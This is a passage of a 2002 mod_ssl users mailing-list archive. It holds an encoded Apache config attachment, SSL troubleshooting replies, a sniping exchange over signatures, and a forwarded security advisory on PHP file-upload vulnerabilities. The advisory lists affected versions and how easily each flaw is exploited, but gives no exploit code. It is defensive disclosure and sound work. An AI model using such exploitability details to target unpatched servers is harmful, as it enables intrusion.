MjAgICAgICAgKSBcCiMgICAgICAgICAgIG9yICV7UkVNT1RFX0FERFJ9ID1+IG0vXjE5MlwuNzZc LjE2MlwuWzAtOV0rJC8KIzwvTG9jYXRpb24+CgojICAgU1NMIEVuZ2luZSBPcHRpb25zOgojICAg U2V0IHZhcmlvdXMgb3B0aW9ucyBmb3IgdGhlIFNTTCBlbmdpbmUuCiMgICBvIEZha2VCYXNpY0F1 dGg6CiMgICAgIFRyYW5zbGF0ZSB0aGUgY2xpZW50IFguNTA5IGludG8gYSBCYXNpYyBBdXRob3Jp c2F0aW9uLiAgVGhpcyBtZWFucyB0aGF0CiMgICAgIHRoZSBzdGFuZGFyZCBBdXRoL0RCTUF1dGgg bWV0aG9kcyBjYW4gYmUgdXNlZCBmb3IgYWNjZXNzIGNvbnRyb2wuICBUaGUKIyAgICAgdXNlciBu YW1lIGlzIHRoZSBgb25lIGxpbmUnIHZlcnNpb24gb2YgdGhlIGNsaWVudCdzIFguNTA5IGNlcnRp ZmljYXRlLgojICAgICBOb3RlIHRoYXQgbm8gcGFzc3dvcmQgaXMgb2J0YWluZWQgZnJvbSB0aGUg dXNlci4gRXZlcnkgZW50cnkgaW4gdGhlIHVzZXIKIyAgICAgZmlsZSBuZWVkcyB0aGlzIHBhc3N3 b3JkOiBgeHhqMzFaTVRaemtWQScuCiMgICBvIEV4cG9ydENlcnREYXRhOgojICAgICBUaGlzIGV4 cG9ydHMgdHdvIGFkZGl0aW9uYWwgZW52aXJvbm1lbnQgdmFyaWFibGVzOiBTU0xfQ0xJRU5UX0NF UlQgYW5kCiMgICAgIFNTTF9TRVJWRVJfQ0VSVC4gVGhlc2UgY29udGFpbiB0aGUgUEVNLWVuY29k ZWQgY2VydGlmaWNhdGVzIG9mIHRoZQojICAgICBzZXJ2ZXIgKGFsd2F5cyBleGlzdGluZykgYW5k IHRoZSBjbGllbnQgKG9ubHkgZXhpc3Rpbmcgd2hlbiBjbGllbnQKIyAgICAgYXV0aGVudGljYXRp b24gaXMgdXNlZCkuIFRoaXMgY2FuIGJlIHVzZWQgdG8gaW1wb3J0IHRoZSBjZXJ0aWZpY2F0ZXMK IyAgICAgaW50byBDR0kgc2NyaXB0cy4KIyAgIG8gU3RkRW52VmFyczoKIyAgICAgVGhpcyBleHBv cnRzIHRoZSBzdGFuZGFyZCBTU0wvVExTIHJlbGF0ZWQgYFNTTF8qJyBlbnZpcm9ubWVudCB2YXJp YWJsZXMuCiMgICAgIFBlciBkZWZhdWx0IHRoaXMgZXhwb3J0YXRpb24gaXMgc3dpdGNoZWQgb2Zm IGZvciBwZXJmb3JtYW5jZSByZWFzb25zLAojICAgICBiZWNhdXNlIHRoZSBleHRyYWN0aW9uIHN0 ZXAgaXMgYW4gZXhwZW5zaXZlIG9wZXJhdGlvbiBhbmQgaXMgdXN1YWxseQojICAgICB1c2VsZXNz IGZvciBzZXJ2aW5nIHN0YXRpYyBjb250ZW50LiBTbyBvbmUgdXN1YWxseSBlbmFibGVzIHRoZQoj ICAgICBleHBvcnRhdGlvbiBmb3IgQ0dJIGFuZCBTU0kgcmVxdWVzdHMgb25seS4KIyAgIG8gQ29t cGF0RW52VmFyczoKIyAgICAgVGhpcyBleHBvcnRzIG9ic29sZXRlIGVudmlyb25tZW50IHZhcmlh YmxlcyBmb3IgYmFja3dhcmQgY29tcGF0aWJpbGl0eQojICAgICB0byBBcGFjaGUtU1NMIDEueCwg bW9kX3NzbCAyLjAueCwgU2lvdXggMS4wIGFuZCBTdHJvbmdob2xkIDIueC4gVXNlIHRoaXMKIyAg ICAgdG8gcHJvdmlkZSBjb21wYXRpYmlsaXR5IHRvIGV4aXN0aW5nIENHSSBzY3JpcHRzLgojICAg byBTdHJpY3RSZXF1aXJlOgojICAgICBUaGlzIGRlbmllcyBhY2Nlc3Mgd2hlbiAiU1NMUmVxdWly ZVNTTCIgb3IgIlNTTFJlcXVpcmUiIGFwcGxpZWQgZXZlbgojICAgICB1bmRlciBhICJTYXRpc2Z5 IGFueSIgc2l0dWF0aW9uLCBpLmUuIHdoZW4gaXQgYXBwbGllcyBhY2Nlc3MgaXMgZGVuaWVkCiMg ICAgIGFuZCBubyBvdGhlciBtb2R1bGUgY2FuIGNoYW5nZSBpdC4KIyAgIG8gT3B0UmVuZWdvdGlh dGU6CiMgICAgIFRoaXMgZW5hYmxlcyBvcHRpbWl6ZWQgU1NMIGNvbm5lY3Rpb24gcmVuZWdvdGlh dGlvbiBoYW5kbGluZyB3aGVuIFNTTAojICAgICBkaXJlY3RpdmVzIGFyZSB1c2VkIGluIHBlci1k aXJlY3RvcnkgY29udGV4dC4gCiNTU0xPcHRpb25zICtGYWtlQmFzaWNBdXRoICtFeHBvcnRDZXJ0 RGF0YSArQ29tcGF0RW52VmFycyArU3RyaWN0UmVxdWlyZQo8RmlsZXMgfiAiXC4oY2dpfHNodG1s fHBodG1sfHBocDM/KSQiPgogICAgU1NMT3B0aW9ucyArU3RkRW52VmFycwo8L0ZpbGVzPgo8RGly ZWN0b3J5ICIvdmFyL3d3dy9jZ2ktYmluIj4KICAgIFNTTE9wdGlvbnMgK1N0ZEVudlZhcnMKPC9E aXJlY3Rvcnk+CgojICAgU1NMIFByb3RvY29sIEFkanVzdG1lbnRzOgojICAgVGhlIHNhZmUgYW5k IGRlZmF1bHQgYnV0IHN0aWxsIFNTTC9UTFMgc3RhbmRhcmQgY29tcGxpYW50IHNodXRkb3duCiMg ICBhcHByb2FjaCBpcyB0aGF0IG1vZF9zc2wgc2VuZHMgdGhlIGNsb3NlIG5vdGlmeSBhbGVydCBi dXQgZG9lc24ndCB3YWl0IGZvcgojICAgdGhlIGNsb3NlIG5vdGlmeSBhbGVydCBmcm9tIGNsaWVu dC4gV2hlbiB5b3UgbmVlZCBhIGRpZmZlcmVudCBzaHV0ZG93bgojICAgYXBwcm9hY2ggeW91IGNh biB1c2Ugb25lIG9mIHRoZSBmb2xsb3dpbmcgdmFyaWFibGVzOgojICAgbyBzc2wtdW5jbGVhbi1z aHV0ZG93bjoKIyAgICAgVGhpcyBmb3JjZXMgYW4gdW5jbGVhbiBzaHV0ZG93biB3aGVuIHRoZSBj b25uZWN0aW9uIGlzIGNsb3NlZCwgaS5lLiBubwojICAgICBTU0wgY2xvc2Ugbm90aWZ5IGFsZXJ0 IGlzIHNlbmQgb3IgYWxsb3dlZCB0byByZWNlaXZlZC4gIFRoaXMgdmlvbGF0ZXMKIyAgICAgdGhl IFNTTC9UTFMgc3RhbmRhcmQgYnV0IGlzIG5lZWRlZCBmb3Igc29tZSBicmFpbi1kZWFkIGJyb3dz ZXJzLiBVc2UKIyAgICAgdGhpcyB3aGVuIHlvdSByZWNlaXZlIEkvTyBlcnJvcnMgYmVjYXVzZSBv ZiB0aGUgc3RhbmRhcmQgYXBwcm9hY2ggd2hlcmUKIyAgICAgbW9kX3NzbCBzZW5kcyB0aGUgY2xv c2Ugbm90aWZ5IGFsZXJ0LgojICAgbyBzc2wtYWNjdXJhdGUtc2h1dGRvd246CiMgICAgIFRoaXMg Zm9yY2VzIGFuIGFjY3VyYXRlIHNodXRkb3duIHdoZW4gdGhlIGNvbm5lY3Rpb24gaXMgY2xvc2Vk LCBpLmUuIGEKIyAgICAgU1NMIGNsb3NlIG5vdGlmeSBhbGVydCBpcyBzZW5kIGFuZCBtb2Rfc3Ns IHdhaXRzIGZvciB0aGUgY2xvc2Ugbm90aWZ5CiMgICAgIGFsZXJ0IG9mIHRoZSBjbGllbnQuIFRo aXMgaXMgMTAwJSBTU0wvVExTIHN0YW5kYXJkIGNvbXBsaWFudCwgYnV0IGluCiMgICAgIHByYWN0 aWNlIG9mdGVuIGNhdXNlcyBoYW5naW5nIGNvbm5lY3Rpb25zIHdpdGggYnJhaW4tZGVhZCBicm93 c2Vycy4gVXNlCiMgICAgIHRoaXMgb25seSBmb3IgYnJvd3NlcnMgd2hlcmUgeW91IGtub3cgdGhh dCB0aGVpciBTU0wgaW1wbGVtZW50YXRpb24KIyAgICAgd29ya3MgY29ycmVjdGx5LiAKIyAgIE5v dGljZTogTW9zdCBwcm9ibGVtcyBvZiBicm9rZW4gY2xpZW50cyBhcmUgYWxzbyByZWxhdGVkIHRv IHRoZSBIVFRQCiMgICBrZWVwLWFsaXZlIGZhY2lsaXR5LCBzbyB5b3UgdXN1YWxseSBhZGRpdGlv bmFsbHkgd2FudCB0byBkaXNhYmxlCiMgICBrZWVwLWFsaXZlIGZvciB0aG9zZSBjbGllbnRzLCB0 b28uIFVzZSB2YXJpYWJsZSAibm9rZWVwYWxpdmUiIGZvciB0aGlzLgojICAgU2ltaWxhcmx5LCBv bmUgaGFzIHRvIGZvcmNlIHNvbWUgY2xpZW50cyB0byB1c2UgSFRUUC8xLjAgdG8gd29ya2Fyb3Vu ZAojICAgdGhlaXIgYnJva2VuIEhUVFAvMS4xIGltcGxlbWVudGF0aW9uLiBVc2UgdmFyaWFibGVz ICJkb3duZ3JhZGUtMS4wIiBhbmQKIyAgICJmb3JjZS1yZXNwb25zZS0xLjAiIGZvciB0aGlzLgpT ZXRFbnZJZiBVc2VyLUFnZW50ICIuKk1TSUUuKiIgXAogICAgICAgICBub2tlZXBhbGl2ZSBzc2wt dW5jbGVhbi1zaHV0ZG93biBcCiAgICAgICAgIGRvd25ncmFkZS0xLjAgZm9yY2UtcmVzcG9uc2Ut MS4wCgojICAgUGVyLVNlcnZlciBMb2dnaW5nOgojICAgVGhlIGhvbWUgb2YgYSBjdXN0b20gU1NM IGxvZyBmaWxlLiBVc2UgdGhpcyB3aGVuIHlvdSB3YW50IGEKIyAgIGNvbXBhY3Qgbm9uLWVycm9y IFNTTCBsb2dmaWxlIG9uIGEgdmlydHVhbCBob3N0IGJhc2lzLgpDdXN0b21Mb2cgbG9ncy9zc2xf cmVxdWVzdF9sb2cgXAogICAgICAgICAgIiV0ICVoICV7U1NMX1BST1RPQ09MfXggJXtTU0xfQ0lQ SEVSfXggXCIlclwiICViIgoKPC9WaXJ0dWFsSG9zdD4gICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgCgo8L0lmRGVmaW5lPgoKCiMgbHhwIE1pbWUtVHlwZQpBZGRUeXBlIGFwcGxpY2F0 aW9uL3gtaHR0cGQtbHhwIC5seHAK --_uReach_com_1804289383101484099723349xxx_-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 11:10:36 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA14899; Thu, 28 Feb 2002 11:09:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id LAA14870; Thu, 28 Feb 2002 11:08:49 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id LAA11203 for ; Thu, 28 Feb 2002 11:08:39 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma011153; Thu, 28 Feb 02 11:08:34 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id LAA22701 for ; Thu, 28 Feb 2002 11:08:33 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id LAA25292 for ; Thu, 28 Feb 2002 11:08:33 +0100 (MET) Message-ID: <3C7E01A1.F31B25DA@bourse.ch> Date: Thu, 28 Feb 2002 11:08:33 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: SSL works from localhost but not elsewhere References: <200202272016.PAA23353@www21.ureach.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Eric Webber wrote: > > When I go to the url https://localhost > using netscape on the same box running > apache and mod_ssl, SSL appears to > work fine. > > But when I come in from a box other than > the box running apache and mod_ssl, I get > Page cannot be displayed. > > I have apache 1.3.20 RedHat, OpenSSL > version 0.9.6b, on redhat version 2.4.7-10. > > Is this because of the Servername ? I am at > a loss and cannot find the solution in the > mod_ssl documentation. Is there a set of > tests to help ferret out this problem ? How do you try to address the server in the remote client browser? You don't type "localhost", by any chance? If not, what do you use? Can you access a plain HTTP site on the server from the remote client? (try this if you haven't already done so). Do other network applications work between the client and server - e.g. ping, telnet etc.? Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 12:44:57 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA24740; Thu, 28 Feb 2002 12:43:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta07.mail.mel.aone.net.au id MAA24519; Thu, 28 Feb 2002 12:40:54 +0100 (MET) Received: from postgresql.org ([63.34.216.150]) by mta07.mail.mel.aone.net.au with ESMTP id <20020228114050.PYXX11125.mta07.mail.mel.aone.net.au@postgresql.org> for ; Thu, 28 Feb 2002 22:40:50 +1100 Message-ID: <3C7E16BF.4EF634E8@postgresql.org> Date: Thu, 28 Feb 2002 22:38:39 +1100 From: Justin Clift X-Mailer: Mozilla 4.78 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Advisory 012002: PHP remote vulnerabilities (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Justin Clift X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Thanks heaps for the info. Passed it on to the PostgreSQL "General" mailing list. :) Regards and best wishes, Justin Clift "R. DuFresne" wrote: > > Considering the plethroa of php users on the list, and the fact many are > perhaps not reading bugtraq: > > ---------- Forwarded message ---------- > From: security@e-matters.de > Subject: Advisory 012002: PHP remote vulnerabilities > Date: Wed, 27 Feb 2002 12:30:56 +0100 > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org > > e-matters GmbH > www.e-matters.de > > -= Security Advisory =- > > Advisory: Multiple Remote Vulnerabilites within PHP's fileupload code > Release Date: 2002/02/27 > Last Modified: 2002/02/27 > Author: Stefan Esser [s.esser@e-matters.de] > > Application: PHP v3.10-v3.18, v4.0.1-v4.1.1 > Severity: Several vulnerabilities in PHP's fileupload code allow > remote compromise > Risk: Critical > Vendor Status: Patches Released > Reference: http://security.e-matters.de/advisories/012002.html > > Overview: > > We found several flaws in the way PHP handles multipart/form-data POST > requests. Each of the flaws could allow an attacker to execute arbitrary > code on the victim's system. > > > Details: > > PHP supports multipart/form-data POST requests (as described in RFC1867) > known as POST fileuploads. Unfourtunately there are several flaws in the > php_mime_split function that could be used by an attacker to execute > arbitrary code. During our research we found out that not only PHP4 but > also older versions from the PHP3 tree are vulnerable. > > > The following is a list of bugs we found: > > PHP 3.10-3.18 > > - broken boundary check (hard to exploit) > - arbitrary heap overflow (easy exploitable) > > PHP 4.0.1-4.0.3pl1 > > - broken boundary check (hard to exploit) > - heap off by one (easy exploitable) > > PHP 4.0.2-4.0.5 > > - 2 broken boundary checks (one very easy and one hard to exploit) > > PHP 4.0.6-4.0.7RC2 > > - broken boundary check (very easy to exploit) > > PHP 4.0.7RC3-4.1.1 > > - broken boundary check (hard to exploit) > > Finally I want to mention that most of these vulnerabilities are > exploitable only on linux or solaris. But the heap off by one is only > exploitable on x86 architecture and the arbitrary heap overflow in > PHP3 is exploitable on most OS and architectures. (This includes *BSD) > > Users running PHP 4.2.0-dev from cvs are not vulnerable to any of the > described bugs because the fileupload code was completly rewritten for > the 4.2.0 branch. > > > Proof of Concept: > > e-matters is not going to release exploits for any of the discovered > vulnerabilities to the public. > > > Vendor Response: > > Because I am part of the php developer team there is not much I can > write here... > > 27th February 2002 - An updated version of php and the patch for > these vulnerabilities are now available at: > http://www.php.net/downloads.php > > > Recommendation: > > If you are running PHP 4.0.3 or above one way to workaround these > bugs is to disable the fileupload support within your php.ini > (file_uploads = Off) If you are running php as module keep in mind > to restart the webserver. Anyway you should better install the > fixed or a properly patched version to be safe. > > > Sidenotice: > > This advisory is so short because I don't want to give out more info > than is needed. > > Users running the developer version of php (4.2.0-dev) are not > vulnerable to these bugs because the fileupload support was completly > rewritten for that branch. > > GPG-Key: > > http://security.e-matters.de/gpg_key.asc > > pub 1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam > Key fingerprint = 43DD 843C FAB9 832A E5AB CAEB 81F2 8110 75E7 AAD6 > > Copyright 2002 Stefan Esser. All rights reserved. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- "My grandfather once told me that there are two kinds of people: those who work and those who take the credit. He told me to try to be in the first group; there was less competition there." - Indira Gandhi ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 14:05:40 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA04349; Thu, 28 Feb 2002 14:04:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id OAA03905; Thu, 28 Feb 2002 14:01:29 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g1SD0ov05950 for ; Thu, 28 Feb 2002 13:01:13 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Thu, 28 Feb 2002 13:00:46 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066E09@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: Advisory 012002: PHP remote vulnerabilities (fwd) Date: Thu, 28 Feb 2002 13:00:40 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This has been sent out by CERT as well. However, I'd be curious to find an administrator who isn't on either CERT or Bugtraq though, especially one who administers multiple systems as many of us do. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Evolution - A crutch for scientists who can't handle the existence of the creator. See "disproven scientific theories" and Romans 1:22. >-----Original Message----- >From: R. DuFresne [mailto:dufresne@sysinfo.com] >Sent: 28 February 2002 00:28 >To: modssl-users@modssl.org >Subject: Advisory 012002: PHP remote vulnerabilities (fwd) > > > >Considering the plethroa of php users on the list, and the >fact many are >perhaps not reading bugtraq: > >---------- Forwarded message ---------- >From: security@e-matters.de >Subject: Advisory 012002: PHP remote vulnerabilities >Date: Wed, 27 Feb 2002 12:30:56 +0100 >To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org > > e-matters GmbH > www.e-matters.de > > -= Security Advisory =- > > > > Advisory: Multiple Remote Vulnerabilites within PHP's >fileupload code > Release Date: 2002/02/27 >Last Modified: 2002/02/27 > Author: Stefan Esser [s.esser@e-matters.de] > > Application: PHP v3.10-v3.18, v4.0.1-v4.1.1 > Severity: Several vulnerabilities in PHP's fileupload code allow > remote compromise > Risk: Critical >Vendor Status: Patches Released > Reference: http://security.e-matters.de/advisories/012002.html > > > >Overview: > > We found several flaws in the way PHP handles >multipart/form-data POST > requests. Each of the flaws could allow an attacker to >execute arbitrary > code on the victim's system. > > >Details: > > PHP supports multipart/form-data POST requests (as >described in RFC1867) > known as POST fileuploads. Unfourtunately there are several >flaws in the > php_mime_split function that could be used by an attacker to execute > arbitrary code. During our research we found out that not >only PHP4 but > also older versions from the PHP3 tree are vulnerable. > > > The following is a list of bugs we found: > > PHP 3.10-3.18 > > - broken boundary check (hard to exploit) > - arbitrary heap overflow (easy exploitable) > > PHP 4.0.1-4.0.3pl1 > > - broken boundary check (hard to exploit) > - heap off by one (easy exploitable) > > PHP 4.0.2-4.0.5 > > - 2 broken boundary checks (one very easy and one hard >to exploit) > > PHP 4.0.6-4.0.7RC2 > > - broken boundary check (very easy to exploit) > > PHP 4.0.7RC3-4.1.1 > > - broken boundary check (hard to exploit) > > > Finally I want to mention that most of these vulnerabilities are > exploitable only on linux or solaris. But the heap off by >one is only > exploitable on x86 architecture and the arbitrary heap overflow in > PHP3 is exploitable on most OS and architectures. (This >includes *BSD) > > Users running PHP 4.2.0-dev from cvs are not vulnerable to >any of the > described bugs because the fileupload code was completly >rewritten for > the 4.2.0 branch. > > >Proof of Concept: > > e-matters is not going to release exploits for any of the discovered > vulnerabilities to the public. > > >Vendor Response: > > Because I am part of the php developer team there is not much I can > write here... > > 27th February 2002 - An updated version of php and the patch for > these vulnerabilities are now available at: > http://www.php.net/downloads.php > > >Recommendation: > > If you are running PHP 4.0.3 or above one way to workaround these > bugs is to disable the fileupload support within your php.ini > (file_uploads = Off) If you are running php as module keep in mind > to restart the webserver. Anyway you should better install the > fixed or a properly patched version to be safe. > > >Sidenotice: > > This advisory is so short because I don't want to give out more info > than is needed. > > Users running the developer version of php (4.2.0-dev) are not > vulnerable to these bugs because the fileupload support was >completly > rewritten for that branch. > > >GPG-Key: > > http://security.e-matters.de/gpg_key.asc > > pub 1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam > Key fingerprint = 43DD 843C FAB9 832A E5AB CAEB 81F2 8110 75E7 AAD6 > > >Copyright 2002 Stefan Esser. All rights reserved. > > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 14:14:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA05397; Thu, 28 Feb 2002 14:12:56 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from zolera.com id OAA05229; Thu, 28 Feb 2002 14:11:30 +0100 (MET) Received: from zolera.com (pool-141-154-57-176.bos.east.verizon.net [141.154.57.176]) by zolera.com (8.11.6/8.11.6) with ESMTP id g1SDCNK01854; Thu, 28 Feb 2002 08:12:23 -0500 Message-ID: <3C7E2CBE.ECA2E84E@zolera.com> Date: Thu, 28 Feb 2002 08:12:30 -0500 From: Rich Salz X-Mailer: Mozilla 4.73 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: John.Airey@rnib.org.uk CC: modssl-users@modssl.org Subject: Re: Advisory 012002: PHP remote vulnerabilities (fwd) References: <9B66BBD37D5DD411B8CE00508B69700F02066E09@pborolocal.rnib.org.uk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Rich Salz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Ya know, lots of people run PHP with Apache -- post the vulnerability there. Lots of people run PHP on Solaris -- post the vulnerability there. Lots of poeple run PHP on Linux -- post hte vulnerability there. Some people probably run PHP on Windows machines -- post it to MSDN chat rooms. Please, let's keep this list on-topic. There's enough modssl traffic as it is! /r$ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 14:14:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA05470; Thu, 28 Feb 2002 14:13:41 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id OAA05257; Thu, 28 Feb 2002 14:11:38 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id OAA04142 for ; Thu, 28 Feb 2002 14:11:30 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma004087; Thu, 28 Feb 02 14:11:26 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id OAA11998 for ; Thu, 28 Feb 2002 14:11:25 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id OAA10547 for ; Thu, 28 Feb 2002 14:11:24 +0100 (MET) Message-ID: <3C7E2C7C.D3DC8A06@bourse.ch> Date: Thu, 28 Feb 2002 14:11:24 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Advisory 012002: PHP remote vulnerabilities (fwd) References: <9B66BBD37D5DD411B8CE00508B69700F02066E09@pborolocal.rnib.org.uk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users John.Airey@rnib.org.uk wrote: > Evolution - A crutch for scientists who can't handle the existence of the > creator. See "disproven scientific theories" and Romans 1:22. Religion: A crutch for people who can't handle the reality of the universe. See "wishful tinking" and the Origin of Species. Rgds, owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 16:01:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA16817; Thu, 28 Feb 2002 16:00:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA16755; Thu, 28 Feb 2002 15:59:51 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 7ADB94CE715; Thu, 28 Feb 2002 15:59:50 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1SEw0C28661; Thu, 28 Feb 2002 15:58:00 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from MAIL.hsc.wvu.edu id NAA27382; Thu, 28 Feb 2002 13:12:15 +0100 (MET) Received: from HSC-DOM4-Message_Server by MAIL.hsc.wvu.edu with Novell_GroupWise; Thu, 28 Feb 2002 07:12:25 -0500 Message-Id: X-Mailer: Novell GroupWise Internet Agent 5.5.5.1 Date: Thu, 28 Feb 2002 07:12:15 -0500 From: "Bryan Tolka" To: Subject: unsubscribe Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Disposition: inline Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id NAA27592 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bryan Tolka" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users >>> streethockey@ureach.com 02/28/02 05:00 AM >>> When I go to the url https://localhost using netscape on the same box running apache and mod_ssl, SSL appears to work fine. But when I come in from a box other than the box running apache and mod_ssl, I get Page cannot be displayed. I have apache 1.3.20 RedHat, OpenSSL version 0.9.6b, on redhat version 2.4.7-10. Is this because of the Servername ? I am at a loss and cannot find the solution in the mod_ssl documentation. Is there a set of tests to help ferret out this problem ? warmest regards, Eric Sean Webber here is a copy of my httpd.conf as a file attachment ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 16:15:28 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA18470; Thu, 28 Feb 2002 16:14:37 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from microanswers.net id QAA18399; Thu, 28 Feb 2002 16:13:43 +0100 (MET) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by microanswers.net (8.11.0/8.11.0) with SMTP id 